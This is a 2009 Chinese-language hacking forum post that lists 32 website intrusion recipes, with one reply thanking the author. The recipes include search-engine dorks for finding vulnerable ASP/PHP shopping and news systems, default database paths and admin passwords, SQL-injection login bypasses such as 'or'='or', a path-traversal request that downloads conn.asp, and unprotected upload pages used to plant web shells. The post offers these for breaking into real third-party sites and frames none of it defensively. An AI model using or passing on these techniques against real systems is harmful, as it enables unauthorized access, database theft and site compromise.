找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 1371|回复: 1

各种网站漏洞利用 整理出来的一些有点用的不难懂的

[复制链接]

60

主题

194

回帖

343

牛毛

一级牛人

☆海的約定、我默然遺忘、ν ̄嫣

积分
343
QQ
发表于 2009-1-17 19:32:46 | 显示全部楼层 |阅读模式 来自 山东省滨州市博兴县
漏洞利用有下面
1.CompHonorBig.asp?id=
2.edit.asp?
3.site:cq.cn inurl:asp
4.Co Net MIB Ver 1.0网站后台管理系统

5.动感购物系统
inurl:help.asp登陆,如未注册成为会员!
upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这2漏洞

6.关键字:****** inurl:readnews.asp
把最后一个/改成%5c ,直接暴库,看密码,进后台

7.
关键字:inurl:Went.asp
后台为manage/login.asp
后台密码: 'or'=' 或者 'or''=''or' 登录 进入
默认数据库地址:Database/DataShop.mdb

8.
关键字:Powered by:94KKBBS 2005
利用密码找回功能 找回admin
提问:ddddd 回答:ddddd

9.
asp?id=1 gov.jp/ asp?id=

10.
关键字:Power System Of Article Management Ver 3.0 Build 200****0628
默认数据库:database\\yiuwekdsodksldfslwifds.mdb

11.
关键字:leichinews
去掉leichinews后面的.
打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp
再上传马.....
进访问uppic anran.asp 登陆马.

12.
关键字:Powered by:QCDN_NEWS
随便扫遍文章加一个' ,来试探注入点
后台地址:admin_index.asp

13.
关键字:inurl:Went.asp
后缀:manage/login.asp
弱口令:'or'='or'

14.
工具: 挖掘机 辅臣数据库读取器
关键字: 企业简介 产品展示 产品列表
后缀添加: /database/myszw.mdb
后台地址: admin/Login.asp

15.
关键字:Team5 Studio All rights reserved
默认数据库:data/team.mdb

16.
关键字:sad Raven's Guestbook
密码地址:/passwd.dat
后台地址:/admin.php

17.
漏洞是利用管理员iis设置的失误
用baidu 关键字就是比较罕见的脚本名
动网: ReloadForumCache.asp
Leadbbs: makealltopanc.asp
BBSXP: admin_fso.asp
动易: admin_articlerecyclebin.asp

18.
工具:网站猎手
关键词:inurl:Went.asp
后缀:manage/login.asp
口令:'or'='or'

19.
动易
列目录
admin_articlerecyclebin.asp
inurl:admin_articlerecyclebin.asp

20.
百度搜索:oioj's blog

21.
新云漏洞
这个漏洞ACCESS和SQL版通吃。
Google搜索关键字 \"关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 管理登录\"
把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp
以源码,软件等下载站居多。
大家时常碰到数据库如果前面或者中间+了# 可以用%23替换就可以下载了
\\database\\%23newasp.mdb
如:#xzws.mdb 改成%23xzws.mdb

22.
通吃所有商城+动力上传系统

使用工具:挖掘鸡 v1.1 明小子
商城入侵:
关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成
漏洞页面:upload.asp
upfile_flash.asp

动力入侵:
关键字:powered by mypower
漏洞页面:upfile_photo.asp
Upfile_Soft.asp
upfile_adpic.asp
upfile_softpic.asp

23.
利用挖掘机
关键机:power by Discuz
路径:/wish.php
配合:
Discuz!论坛 wish.php远程包含漏洞 工具使用

24.
百度里输入/skins/default/

25.
无忧传奇官方站点程序。
1、后台管理地址:http://您的域名/msmiradmin/
2、默认后台管理帐号:msmir
3、默认后台管理密码:msmirmsmir
数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb
数据库连接文件为 ***********/Conn.asp

26.
1.打开百度或GOOGLE搜索,输入powered by comersus ASP shopping cart
open source。 这是一个商场系统。
2.网站的最底部分,有个 Comersus Open Technologies LC。打开看下~~comersus系统~
猜到,comersus.mdb. 是数据库名
数据库都是放在database/ 后的,
所以database/comersus.mdb
comersus_listCategoriesTree.asp换成database/comersus.mdb,不能下载。
那样把前一个''store/''除去,再加上database/comersus.mdb 试试

27.
VBulletin论坛的数据库
默认数据库地址!
/includes/functions.php
工具:
1.网站猎手 下载地址:百度 Google!
2.Google
关键字:
Powered by: vBulletin Version 3.0.1
Powered by: vBulletin Version 3.0.2
Powered by: vBulletin Version 3.0.3

28.
intitle:网站小助手 inurl:asp

29.
Upfile_Article.asp bbs/upfile.asp
输入关键字:powered by mypower ,

30.
baidu中搜索关键字Ver5.0 Build 0519
(存在上传漏洞)

31.
用挖掘机
关键字:Powered by WEBBOY
页面:/upfile.asp

32.
关键词:inurl:Went.asp
后缀:manage/login.asp
口令:'or'='or'

66

主题

16

回帖

620

牛毛

一级牛人

积分
620
发表于 2010-10-22 10:10:26 | 显示全部楼层 来自 广东省广州市
学习了!!!
我直接用亿思平台进行漏洞的扫描的!
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-4-26 09:00 , Processed in 0.222429 second(s), 39 queries .

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表